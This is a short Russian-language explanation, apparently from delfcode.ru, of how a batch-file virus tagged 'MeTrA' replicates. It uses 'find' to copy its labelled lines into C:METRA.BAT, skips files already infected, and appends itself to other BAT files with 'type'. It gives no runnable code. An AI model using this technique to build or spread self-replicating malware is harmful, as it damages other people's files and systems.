Смысл заражения таков: в вирусе каждая строчка имеет метку, в данном примере она MeTrA. Например, в первой строке эта метка ничего не делает, во второй строке эта метка, как бы, не является пассивной, она используется для внутренней работы вируса, а именно участвует в названии метки. При запуске вирус проверяет, есть ли файл C:METRA.BAT, если нет, то вирус создает его и с помощью программы find копирует из файла (из которого стартовал) все строки содержащие метку вируса, т.е. копирует только вирусные строки. Так, вирусные строки скопированы. Значит в файле C:METRA.BAT теперь находится копия вируса. Далее вирус ищет BAT-файлы. Чтобы не происходило повторного заражения используется все таже программа find. Допустим вирус нашел файл RUN.BAT и он оказался еще не заражен, тогда вирус вызывает файл C:METRA.BAT с такими параметрами: In_ RUN.BAT, здесь первый параметр In_ говорит вирусу, что надо заразить файл, имя которого указано во-втором параметре, в данном случае он RUN.BAT.Вирус в C:METRA.BAT заражает файл RUN.BAT простейшим способом - с помощью команды type дописывает к файлу RUN.BAT себя. Вот так файл RUN.BAT оказывается зараженным.

delfcode.ru